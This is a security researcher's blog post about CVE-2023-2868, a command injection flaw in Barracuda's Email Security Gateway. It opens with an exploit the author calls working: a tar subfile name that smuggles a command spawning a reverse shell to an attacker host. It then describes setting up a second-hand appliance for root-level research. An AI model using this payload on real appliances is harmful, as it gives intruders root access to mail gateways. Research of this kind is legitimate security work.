Some of my past research work involved crafting one of the first public proof of concepts for CVE-2023-2868, a command injection vulnerability in Barracuda’s Email Security Gateway appliance. My writeup can be found on AttackerKB, and my original ruby PoC code can be found here.
CVE-2023-2868 is a command injection vulnerability in Barracuda ESG’s custom wrapper for amavisd. A .tar file in the following format would trigger RCE:
randomLetters.tar < - name of the tar file
- `setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect #{LHOST}:#{LPORT} >/tmp/p 2>/dev/null;rm /tmp/p"`
^ The filename of a subfile within the tar file; subfile contents are random.
This is a reconstruction of the details hinted at in Mandiant’s Blog, and works exactly as is.
The vulnerability was patched in updates following the aforementioned blogs. However, for those who have an ESG appliance on their kitchen counter (lacking said security patches), CVE-2023-2868 can be used to get a root shell for further research. This post will explore that opportunity.
Let’s start from the complete beginning with the Barracuda ESG 300 appliance. First you gotta get one. Barraguard is a certified seller, but you may get lucky on eBay.
Once you get the device, plug in peripherals (keyboard, mouse, monitor) and power it up. Perform a hard factory reset by pressing the “reset” button with a pin for several seconds until it restarts. This ensures a clean state.